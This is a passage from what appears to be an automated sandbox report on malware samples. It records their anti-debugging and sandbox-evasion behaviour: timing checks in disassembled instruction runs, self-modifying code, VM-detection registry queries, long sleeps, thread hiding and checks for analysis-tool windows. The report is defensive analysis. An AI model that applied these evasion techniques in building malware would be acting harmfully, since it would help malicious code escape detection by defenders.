Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1061D70 second address: 1061D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FA44129712Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1061D80 second address: 1061D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10643BC second address: 10643C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10643C2 second address: 10643C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10661EC second address: 1066209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297135h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1066209 second address: 106620D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106620D second address: 1066293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edi, 7E45678Fh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FA441297128h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jp 00007FA44129712Ch 0x00000032 mov dword ptr [ebp+122D3BB1h], eax 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FA441297128h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 xor dword ptr [ebp+122D2813h], esi 0x0000005a xchg eax, esi 0x0000005b jmp 00007FA441297130h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jnc 00007FA441297126h 0x0000006b rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1066293 second address: 1066299 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1068993 second address: 1068998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106AB69 second address: 106ABEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FA4407343D8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 and ebx, 4FCAF20Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FA4407343D8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov di, 7CFFh 0x0000004b adc di, B9FCh 0x00000050 jp 00007FA4407343DEh 0x00000056 pushad 0x00000057 mov dword ptr [ebp+122D2674h], edx 0x0000005d popad 0x0000005e push 00000000h 0x00000060 cld 0x00000061 push eax 0x00000062 ja 00007FA4407343E2h 0x00000068 jo 00007FA4407343DCh 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106BA88 second address: 106BA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106BA8E second address: 106BA93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106BA93 second address: 106BAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, dword ptr [ebp+122D3B4Dh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FA441297128h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bx, 9009h 0x00000030 mov dword ptr [ebp+122D24DFh], edi 0x00000036 xchg eax, esi 0x00000037 jno 00007FA44129712Ch 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA441297136h 0x00000045 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 106CB47 second address: 106CB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343E0h 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7FF6D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7FF7B1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9A36D7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A28996 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Special instruction interceptor: First address: EAED71 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Special instruction interceptor: First address: 104DF18 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Special instruction interceptor: First address: 105DB11 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Special instruction interceptor: First address: 10DCA48 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C9ED71 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E3DF18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E4DB11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: ECCA48 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Special instruction interceptor: First address: 83F6D1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Special instruction interceptor: First address: 83F7B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Special instruction interceptor: First address: 9E36D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Special instruction interceptor: First address: A68996 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Special instruction interceptor: First address: F5A11D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Special instruction interceptor: First address: F7DAE7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Special instruction interceptor: First address: F61C71 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 4B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 4E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 4B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 51B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 54A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 74A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 56B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 58C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Memory allocated: 56D0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_04A30BED rdtsc 22_2_04A30BED
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 778
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 805
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 476
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 779
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 801
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 780
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6404 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7096 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5160 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3792 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6876 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3708 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6184 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7156 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8980 Thread sleep count: 778 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8980 Thread sleep time: -1556778s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9048 Thread sleep count: 805 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9048 Thread sleep time: -1610805s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8968 Thread sleep count: 476 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8968 Thread sleep time: -14280000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8984 Thread sleep count: 779 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8984 Thread sleep time: -1558779s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9120 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8992 Thread sleep count: 801 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8992 Thread sleep time: -1602801s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8988 Thread sleep count: 1081 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8988 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8992 Thread sleep count: 780 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8992 Thread sleep time: -1560780s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe TID: 8876 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe TID: 6332 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAEC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CAEC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000018.00000002.2673227391.0000000000E19000.00000040.00000001.01000000.0000000E.sdmp, 80b5f835af.exe, 0000001A.00000002.2872008648.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, 80b5f835af.exe, 0000001D.00000002.3017085874.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, e8cb2646d2.exe, 0000001E.00000000.2956794559.0000000000F3A000.00000080.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 0000001E.00000002.3106354885.0000000000F3A000.00000040.00000001.01000000.00000010.sdmp, 80b5f835af.exe, 0000001F.00000002.3094238878.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, e8cb2646d2.exe, 00000020.00000002.3172597027.0000000000F3A000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 00000020.00000000.3121425821.0000000000F3A000.00000080.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 00000021.00000002.3307990312.0000000000F3A000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 00000021.00000000.3252210347.0000000000F3A000.00000080.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552x
Source: file.exe, 00000000.00000002.2625469567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareS%
Source: DocumentsCBAKJEHDBG.exe, 00000016.00000003.2617734255.0000000000909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.000000000120A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2625469567.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2625469567.0000000001327000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001A.00000002.2874044959.0000000001432000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001A.00000002.2874044959.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001D.00000002.3017859957.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareS
Source: file.exe, 00000000.00000002.2619954244.0000000000986000.00000040.00000001.01000000.00000003.sdmp, DocumentsCBAKJEHDBG.exe, 00000016.00000002.2652443392.0000000001029000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000017.00000002.2673002617.0000000000E19000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000018.00000002.2673227391.0000000000E19000.00000040.00000001.01000000.0000000E.sdmp, 80b5f835af.exe, 0000001A.00000002.2872008648.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, 80b5f835af.exe, 0000001D.00000002.3017085874.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, e8cb2646d2.exe, 0000001E.00000000.2956794559.0000000000F3A000.00000080.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 0000001E.00000002.3106354885.0000000000F3A000.00000040.00000001.01000000.00000010.sdmp, 80b5f835af.exe, 0000001F.00000002.3094238878.00000000009C6000.00000040.00000001.01000000.0000000F.sdmp, e8cb2646d2.exe, 00000020.00000002.3172597027.0000000000F3A000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwaren'
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1RECOVE~1470bankoRecoveryImprovedVMware20,11696487552x
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
